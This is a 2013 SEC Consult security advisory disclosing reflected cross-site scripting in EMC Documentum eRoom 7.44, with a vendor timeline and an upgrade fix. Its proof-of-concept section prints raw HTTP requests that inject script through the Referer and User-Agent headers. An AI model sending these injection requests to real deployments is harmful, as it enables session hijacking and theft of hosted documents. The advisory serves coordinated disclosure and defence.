Multiple reflected cross-site scripting vulnerabilities

SEC Consult Vulnerability Lab Security Advisory < 20131107-0 >

=======================================================================

title: Multiple reflected cross-site scripting vulnerabilities

product: EMC Documentum eRoom

vulnerable version: 7.44

fixed version: 7.4.4 P11

CVE: CVE-2013-3286

impact: medium

homepage: www.emc.com/products/detail/software2/eroom.htm

found: 2012-08-20

by: V. Paulikas

SEC Consult Vulnerability Lab

www.sec-consult.com

=======================================================================

 

 

Vendor description:

-------------------

 

"EMC Documentum eRoom is easy-to-use online team collaboration software that

enables distributed teams to work together more efficiently. With Documentum

eRoom, teams around the world can accelerate document collaboration and group

activities, improve the development and delivery of products and services,

optimize collaborative business processes, improve innovation, and streamline

decision-making."

 

www.emc.com/products/detail/software2/eroom.htm

 

 

Vulnerability overview/description:

-----------------------------------

 

Documentum eRoom suffers from multiple reflected cross-site scripting

vulnerabilities, which allow an attacker to steal other user's sessions,

to impersonate other users and to gain unauthorized access to documents

hosted in eRooms. A JavaScript worm could be utilized to crawl an eRoom and

gather all available documents.

 

There are many parameters which are not properly sanitized and thus are

vulnerable to XSS.

 

 

Proof of concept:

-----------------

 

1) The "Referer" header is not properly validated and is thus prone to reflected cross-site

scripting.

 

Request:

POST /eRoomASP/Connect.asp?Ctxt=&ERClickInMap=FALSE&command=btnDefault&SessionKey= HTTP/1.1

Host: localhost

Referer: localhost/eRoomxss">

<script>alert(document.cookie)</script>

 

IEDummyField=bugfix+29315&SubmitChecker=set&HasRichText=false&SessionKey=&ERWindowName=eRw1343558275&LoginName=asd&Password=asd

 

2) The "User-Agent" header is not properly validated and is thus prone to reflected cross-site

scripting.

 

Request:

GET /eRoomtest/diagVariables.asp HTTP/1.1

User-Agent: <script>alert(document.cookie)</script>

 

Host: localhost

 

Other vulnerable header fields include "Connection" and "Accept-Language".

 

 

Vendor contact timeline:

------------------------

2012-10-09: Contacting vendor through security_alert@emc.com

2012-10-09: Vendor forwarded information to product team

2012-10-31: Vendor investigates reported issues

2013-07-16: Vendor will release the fixes of the issues with 7.4.4 SP1 in early Q2 2014

2013-11-13: Coordinated release of advisory

 

 

Solution:

---------

 

Upgrade to EMC Documentum eRoom version 7.4.4 P11.

 

 

Advisory URL:

-------------

www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

 

SEC Consult

Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

 

Headquarter:

Mooslackengasse 17, 1190 Vienna, Austria

Phone: +43 1 8903043 0

Fax: +43 1 8903043 15

 

Mail: research at sec-consult dot com

Web: www.sec-consult.com

Blog: blog.sec-consult.com

Twitter: twitter.com/sec_consult

 

EOF V. Paulikas / @2013